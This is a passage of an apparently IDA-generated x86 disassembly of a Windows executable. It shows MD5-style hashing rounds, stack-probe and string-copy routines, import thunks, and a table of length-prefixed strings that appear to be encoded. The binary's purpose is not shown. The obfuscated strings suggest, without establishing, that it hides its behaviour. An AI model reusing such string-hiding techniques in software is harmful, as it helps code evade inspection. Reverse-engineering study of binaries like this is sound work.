add eax, [esi+10h]
add eax, 4BDECFA9h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424763
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 0F6BB4B60h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424763
add eax, [edi+4]
add eax, [esi+28h]
add eax, 0BEBFBC70h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424763
add eax, [edi]
add eax, [esi+34h]
add eax, 289B7EC6h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424763
add eax, [edi+0Ch]
add eax, [esi]
add eax, 0EAA127FAh
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424763
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0D4EF3085h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424763
add eax, [edi+4]
add eax, [esi+18h]
add eax, 4881D05h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424763
add eax, [edi]
add eax, [esi+24h]
add eax, 0D9D4D039h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424763
add eax, [edi+0Ch]
add eax, [esi+30h]
add eax, 0E6DB99E5h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424763
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 1FA27CF8h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424763
add eax, [edi+4]
add eax, [esi+8]
add eax, 0C4AC5665h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_42476A
add eax, [edi]
add eax, [esi]
add eax, 0F4292244h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_42476A
add eax, [edi+0Ch]
add eax, [esi+1Ch]
add eax, 432AFF97h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_42476A
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0AB9423A7h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_42476A
add eax, [edi+4]
add eax, [esi+14h]
add eax, 0FC93A039h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_42476A
add eax, [edi]
add eax, [esi+30h]
add eax, 655B59C3h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_42476A
add eax, [edi+0Ch]
add eax, [esi+0Ch]
add eax, 8F0CCC92h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_42476A
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFEFF47Dh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_42476A
add eax, [edi+4]
add eax, [esi+4]
add eax, 85845DD1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_42476A
add eax, [edi]
add eax, [esi+20h]
add eax, 6FA87E4Fh
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_42476A
add eax, [edi+0Ch]
add eax, [esi+3Ch]
add eax, 0FE2CE6E0h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_42476A
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A3014314h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_42476A
add eax, [edi+4]
add eax, [esi+34h]
add eax, 4E0811A1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_42476A
add eax, [edi]
add eax, [esi+10h]
add eax, 0F7537E82h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_42476A
add eax, [edi+0Ch]
add eax, [esi+2Ch]
add eax, 0BD3AF235h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_42476A
add eax, [edi+8]
add eax, [esi+8]
add eax, 2AD7D2BBh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_42476A
add eax, [edi+4]
add eax, [esi+24h]
add eax, 0EB86D391h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov eax, ds:10013990h
add [edi], eax
mov eax, ds:10013994h
add [edi+4], eax
mov eax, ds:10013998h
add [edi+8], eax
mov eax, ds:1001399Ch
add [edi+0Ch], eax
popa
pop ebp
xor eax, eax
retn 8
sub_42479A endp
; =============== S U B R O U T I N E =======================================
sub_424FE5 proc near ; CODE XREF: sub_425002+1E�p
var_FFC = dword ptr -0FFCh
pop ecx
loc_424FE6: ; CODE XREF: sub_424FE5+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_424FE6
sub esp, eax
test [esp+0FFCh+var_FFC], eax
push ecx
retn
sub_424FE5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_425002 proc near ; CODE XREF: sub_4206FE+43�p
arg_0 = dword ptr 4
pop ecx
pop eax
add eax, 3
shr eax, 2
shl eax, 2
cmp eax, 1000h
jl short loc_425032
mov edx, esp
push eax
fild [esp-4+arg_0]
mov [esp-4+arg_0], ecx
fild [esp-4+arg_0]
call sub_424FE5
mov esp, edx
push edx
fistp dword ptr [esp+0]
mov ecx, [esp+0]
fistp dword ptr [esp+0]
pop eax
loc_425032: ; CODE XREF: sub_425002+10�j
sub esp, eax
mov eax, esp
mov dword ptr [eax], 0
push ecx
push ecx
retn
sub_425002 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
dd 40C03100h, 0CC2h, 3CD95000h, 24048B24h, 2434BA0Fh, 0C816608h
db 24h, 0, 2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42506C
loc_42505B: ; CODE XREF: sub_42506C+D�j
fldcw word ptr [esp+4+var_4]
pop ecx
mov al, ah
and eax, 3
retn
; END OF FUNCTION CHUNK FOR sub_42506C
; ---------------------------------------------------------------------------
db 50h, 0D9h, 3Ch
dd 0F3EB5824h
; =============== S U B R O U T I N E =======================================
sub_42506C proc near ; CODE XREF: .data:loc_41A5B4�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042505B SIZE 0000000A BYTES
push eax
fnstcw word ptr [esp+4+var_4]
mov eax, [esp+4+var_4]
or word ptr [esp+4+var_4], 300h
jmp short loc_42505B
sub_42506C endp
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
sub_42507D proc near ; CODE XREF: sub_41A910+8�p
; sub_41BEF1+8�p ...
var_FFC = dword ptr -0FFCh
pop ecx
loc_42507E: ; CODE XREF: sub_42507D+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_42507E
sub esp, eax
test [esp+0FFCh+var_FFC], eax
jmp ecx
sub_42507D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
sub_42509D proc near ; CODE XREF: sub_41A910+258�p
; sub_41A910+5DC�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_42509D endp
; ---------------------------------------------------------------------------
align 4
dd 0AC25FF00h, 90100140h, 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4250D5 proc near ; CODE XREF: sub_41A669+10�p
jmp dword ptr ds:100140B0h
sub_4250D5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4250E1 proc near ; CODE XREF: sub_41A48D+13�p
jmp dword ptr ds:100140B4h
sub_4250E1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4250ED proc near ; CODE XREF: sub_41A5D0+33�p
; sub_41A5D0+45�p ...
jmp dword ptr ds:100140C0h
sub_4250ED endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4250F9 proc near ; CODE XREF: sub_41A5D0+B�p
; sub_41A5D0+17�p ...
jmp dword ptr ds:100140C4h
sub_4250F9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h, 0C825FF00h, 90100140h, 90h, 0CC25FF00h, 90100140h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42511D proc near ; CODE XREF: sub_41A669+4E�p
; sub_41A669+87�p
jmp dword ptr ds:100140D0h
sub_42511D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_425129 proc near ; CODE XREF: .data:0041A593�p
jmp dword ptr ds:100140D4h
sub_425129 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_425135 proc near ; CODE XREF: sub_41A5D0+71�p
; sub_41A5D0+86�p
jmp dword ptr ds:100140D8h
sub_425135 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_425141 proc near ; CODE XREF: sub_41A669+9E�p
jmp dword ptr ds:100140DCh
sub_425141 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h, 30h dup(0)
dd 0BC3400h, 10h, 4 dup(0)
dd 732500h, 72007700h, 1Ch dup(0)
dd 200h, 0
dd 500h, 300h, 2 dup(500h), 400h, 200h, 2 dup(500h), 200h
dd 100h, 300h, 2 dup(400h), 700h, 2 dup(0)
dd 300h, 2 dup(800h), 2 dup(600h), 0
dd 500h, 0
dd 700h, 2 dup(300h), 200h, 500h, 300h, 800h, 300h, 900h
dd 200h, 800h, 200h, 0
dd 3 dup(400h), 200h, 2 dup(700h), 0
dd 200h, 400h, 0Bh dup(0)
dd 137DA00h, 0E86010h, 61000000h, 0E9h, 0
dd 1100h, 0Fh dup(0)
db 0
db 0A5h, 0EEh, 0F7h
db 0E1h ;
db 2Ch, 7Eh, 0FDh
db 0BFh ;
db 7Fh, 0E8h, 9Ah
db 86h ;
db 82h, 40h, 24h
db 0CCh ;
db 0E2h, 0DDh, 6Ah
db 0D7h ;
db 2 dup(0E1h), 77h
db 1Bh
db 0B0h, 15h, 52h
db 50h ; P
db 56h, 64h, 4Bh
db 0D2h ;
db 6Bh, 7Ch, 35h
db 3Dh ; =
db 0D5h, 85h, 0Eh
db 28h ; (
db 0F9h, 51h, 0B0h
db 1Ah
db 44h, 87h, 4Eh
db 1Eh
db 0DFh, 0CCh, 83h
db 0E3h ;
db 37h, 47h, 3Dh
db 32h ; 2
db 18h, 5, 0F8h
db 14h
db 0BFh, 37h, 6
db 6Eh ; n
align 10h
db 0
db 9Fh, 4Bh, 0
db 10h
db 99h, 52h, 0
db 10h
db 0FDh, 8Bh, 0
db 10h
db 0BDh, 2Ah, 0
db 10h
db 0C5h, 2Ah, 0
db 10h
db 0E9h, 78h, 0
db 10h
db 0ACh, 4Ch, 0
db 10h
align 10h
db 0
db 0CDh, 0B0h, 0
db 10h
db 0CDh, 2Ah, 0
db 10h
db 51h, 71h, 0
db 10h
db 59h, 99h, 0
db 10h
db 9, 62h, 0
db 10h
db 0E5h, 88h, 0
db 10h
db 0A8h, 3Bh, 0
db 10h
db 34h, 22h, 1
db 10h
align 4
db 0
db 6Ah, 88h, 0
db 10h
db 0B7h, 39h, 0
db 10h
db 5Ah, 72h, 0
db 10h
db 4Bh, 33h, 0
db 10h
db 53h, 33h, 0
db 10h
db 30h, 98h, 0
db 10h
db 0AAh, 6Fh, 0
db 10h
db 58h, 22h, 1
db 10h
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3Eh, 2 dup(0)
db 0
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3Fh, 2 dup(0)
db 0
db 34h, 2 dup(0)
db 0
db 35h, 2 dup(0)
db 0
db 36h, 2 dup(0)
db 0
db 37h, 2 dup(0)
db 0
db 38h, 2 dup(0)
db 0
db 39h, 2 dup(0)
db 0
db 3Ah, 2 dup(0)
db 0
db 3Bh, 2 dup(0)
db 0
db 3Ch, 2 dup(0)
db 0
db 3Dh, 2 dup(0)
db 0
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
align 4
db 0
db 1, 2 dup(0)
db 0
db 2, 2 dup(0)
db 0
db 3, 2 dup(0)
db 0
db 4, 2 dup(0)
db 0
db 5, 2 dup(0)
db 0
db 6, 2 dup(0)
db 0
db 7, 2 dup(0)
db 0
db 8, 2 dup(0)
db 0
db 9, 2 dup(0)
db 0
db 0Ah, 2 dup(0)
db 0
db 0Bh, 2 dup(0)
db 0
db 0Ch, 2 dup(0)
db 0
db 0Dh, 2 dup(0)
db 0
db 0Eh, 2 dup(0)
db 0
db 0Fh, 2 dup(0)
db 0
db 10h, 2 dup(0)
db 0
db 11h, 2 dup(0)
db 0
db 12h, 2 dup(0)
db 0
db 13h, 2 dup(0)
db 0
db 14h, 2 dup(0)
db 0
db 15h, 2 dup(0)
db 0
db 16h, 2 dup(0)
db 0
db 17h, 2 dup(0)
db 0
db 18h, 2 dup(0)
db 0
db 19h, 2 dup(0)
db 0
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 1Ah, 2 dup(0)
db 0
db 1Bh, 2 dup(0)
db 0
db 1Ch, 2 dup(0)
db 0
db 1Dh, 2 dup(0)
db 0
db 1Eh, 2 dup(0)
db 0
db 1Fh, 2 dup(0)
db 0
db 20h, 2 dup(0)
db 0
db 21h, 2 dup(0)
db 0
db 22h, 2 dup(0)
db 0
db 23h, 2 dup(0)
db 0
db 24h, 2 dup(0)
db 0
db 25h, 2 dup(0)
db 0
db 26h, 2 dup(0)
db 0
db 27h, 2 dup(0)
db 0
db 28h, 2 dup(0)
db 0
db 29h, 2 dup(0)
db 0
db 2Ah, 2 dup(0)
db 0
db 2Bh, 2 dup(0)
db 0
db 2Ch, 2 dup(0)
db 0
db 2Dh, 2 dup(0)
db 0
db 2Eh, 2 dup(0)
db 0
db 2Fh, 2 dup(0)
db 0
db 30h, 2 dup(0)
db 0
db 31h, 2 dup(0)
db 0
db 32h, 2 dup(0)
db 0
db 33h, 2 dup(0)
db 0
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 4Ah, 23h, 0
db 10h
db 52h, 23h, 0
db 10h
db 96h, 23h, 0
db 10h
db 0DBh, 23h, 0
db 10h
aCreatethread_1 db 'CreateThread',0
aEntercritica_0 db 'EnterCriticalSection',0
aInitializecr_0 db 'InitializeCriticalSection',0
aLeavecritica_0 db 'LeaveCriticalSection',0
align 4
db 0
db 4, 0, 8Eh
db '',0
db 4, 2 dup(0)
db 0
db 6Ch, 0, 2Eh
db 0
db 23h, 0, 28h
db 0
db 35h, 2 dup(0)
db 0
db 4, 0, 86h
db 0A8h ;
db 0E8h, 0EAh, 0F5h
db 0
db 1, 0, 83h
db 0DFh ;
align 2
dw 5
db 84h ;
db 0AAh, 0E0h, 0E5h
db 0F0h ;
db 0E5h, 0, 0Eh
db 0
db 0B8h, 0FFh, 0DDh
db 0CCh ;
db 0F4h, 0D7h, 0DBh
db 0D9h ;
db 0D4h, 0DDh, 0F1h
db 0D6h ;
db 0DEh, 0D7h, 0F9h
db 0
db 0Dh, 0, 0D9h
aUNpLkBs db '',0
dw 14h
db 89h ;
db 0CFh, 0E0h, 0E5h
db 0ECh ;
db 0DDh, 0E0h, 0E4h
db 0ECh ;
db 0DDh, 0E6h, 0DAh
db 0F0h ;
db 0FAh, 0FDh, 0ECh
aFRf db '',0
dw 0Fh
db 8Eh ;
db 0CDh, 0E1h, 0E3h
db 0FEh ;
db 0EFh, 0FCh, 0EBh
aCtiCui db '',0
db 15h, 0, 0CDh
aKiIvbAidglvAmD db '',0
dw 14h
db 93h ;
db 0DAh, 0FDh, 0E7h
db 0F6h ;
db 0E1h, 0FFh, 0FCh
db 0F0h ;
db 0F8h, 0F6h, 0F7h
db 0D7h ;
db 0F6h, 0F0h, 0E1h
db 0F6h ;
db 0FEh, 0F6h, 0FDh
db 0E7h ;
align 2
dw 14h
db 7Ah ; z
db 33h, 14h, 0Eh
db 1Fh
db 8, 16h, 15h
db 19h
db 11h, 1Fh, 1Eh
db 33h ; 3
db 14h, 19h, 8
db 1Fh
db 17h, 1Fh, 14h
db 0Eh
align 2
dw 13h
aVaCAibmAjKD db 'ł',0
db 12h, 0, 76h
db 31h ; 1
db 13h, 2, 3Bh
db 19h
db 12h, 3, 1Ah
db 13h
db 30h, 1Fh, 1Ah
db 13h
db 38h, 17h, 1Bh
db 13h
db 37h, 0, 0Ah
db 0
a9viWtlmAx db '9vI\WtLM\Ax',0
db 0Ch, 0, 0AFh
aTU db '',0
db 9,0
db 54h
db 17h
db 3Bh, 24h, 2Dh
db 12h
db 3Dh, 38h, 31h
db 15h
align 2
dw 11h
db 90h ;
db 0D7h, 0F5h, 0E4h
db 0D4h ;
db 0F9h, 0E3h, 0FBh
db 0D6h ;
db 0E2h, 2 dup(0F5h)
db 0C3h ;
db 0E0h, 0F1h, 0F3h
db 0F5h ;
db 0D1h, 0, 0Ch
db 0
db 90h, 0C3h, 0F5h
db 0E4h ;
db 0D5h, 2 dup(0E2h)
db 0FFh
db 0E2h, 0DDh, 0FFh
db 0F4h ;
db 0F5h, 0, 11h
db 0
aB@qLqfja@qmw@d db '%b@Q`]LQfJA@qMW@DA',0
db 0Dh,0
dw 5017h
aRcseArcngrv db 'rcSe~arCngrV',0
db 9,0
aBoigdliV db 'ǁ',0
db 0Dh,0
a8QvV@lQtY db '8~QV\v]@L~QT]y',0
db 0Eh
db 0
db 88h, 0CEh, 0E1h
db 0E6h ;
db 0ECh, 0CEh, 0E1h
db 0FAh ;
db 0FBh, 0FCh, 0CEh
aSfa db '',0
db 0Ch, 0, 0E9h
aOmaAkvkjZa db '',0
db 0Dh,0
a5gayopgzxpxzgl db '5gAYoPGZxPXZGL',0
db 0Dh,0
db 89h ;
db 0CEh, 0ECh, 0FDh
db 0DAh ;
db 0F0h, 0FAh, 0FDh
aFRf_0 db '',0
db 9,0
db 90h, 0DCh, 0FFh
db 0F3h ;
db 0F1h, 0FCh, 0D6h
db 0E2h ;
db 2 dup(0F5h), 0
db 0Ah
align 2
aDgkididdgk db 8,'DgkidIddgk',0
db 0Bh,0
db 1Dh
aKtoihQOxx db 'Ktoih|q[oxx',0
db 0Ch, 0, 7Ch
db 2Ah ; *
db 15h, 0Eh, 8
db 9
db 1Dh, 10h, 3Dh
db 10h
db 10h, 13h, 1Fh
db 0
db 8, 0, 9Bh
db 0C9h ;
db 0FEh, 0FAh, 0FFh
db 0DDh ;
db 0F2h, 0F7h, 0FEh
db 0
db 0Ch, 0, 3Bh
aOoVkkzosz db '|^Oo^VKkZOSz',0
db 12h, 0, 0DDh
aSRPdoiIio db '',0
db 13h
db 0
db 72h, 3Fh, 7
db 1Eh
db 6, 1Bh, 30h
db 0Bh
db 6, 17h, 26h
db 1Dh
db 25h, 1Bh, 16h
db 17h
db 31h, 1Ah, 13h
db 0
align 2
dw 13h
aXljzbkgCnpOLaZ db '',0
db 7,0
db 5Bh
db 0Ch
db 32h, 35h, 1Eh
db 23h ; #
db 3Eh, 38h, 0
db 8
align 2
dw 7C10h
aCdbUG db 'cdb|u~G',0
db 0Bh,0
dw 0E2A5h
db 0C0h ;
db 0D1h, 0E3h, 0CCh
db 0C9h ;
db 0C0h, 0F6h, 0CCh
db 0DFh ;
db 0C0h, 0, 0Bh
db 0
aGrI db '',0
db 9,0
aSJKijgk db 'Ϙ',0
db 0Eh
db 0
db 0A2h, 0F1h, 0C7h
db 0D6h ;
db 0E4h, 0CBh, 0CEh
db 0C7h ;
db 0F2h, 0CDh, 0CBh
db '',0
db 0Bh,0
db 41h
db 5
a5 db '$-$5$',7,'(-$',0
align 10h
db 0Bh,0
dw 0B6F5h
aZrfbrSr db '',0
db 0Ch
db 0
db 7Ah, 36h, 15h
db 1Bh
db 1Eh, 36h, 13h
db 18h
db 8, 1Bh, 8
db 3
db 3Bh, 0, 10h
db 0
a5rpaxzq@ypTQyp db '5rPAxZQ@YP}T[QYPt',0
db 4
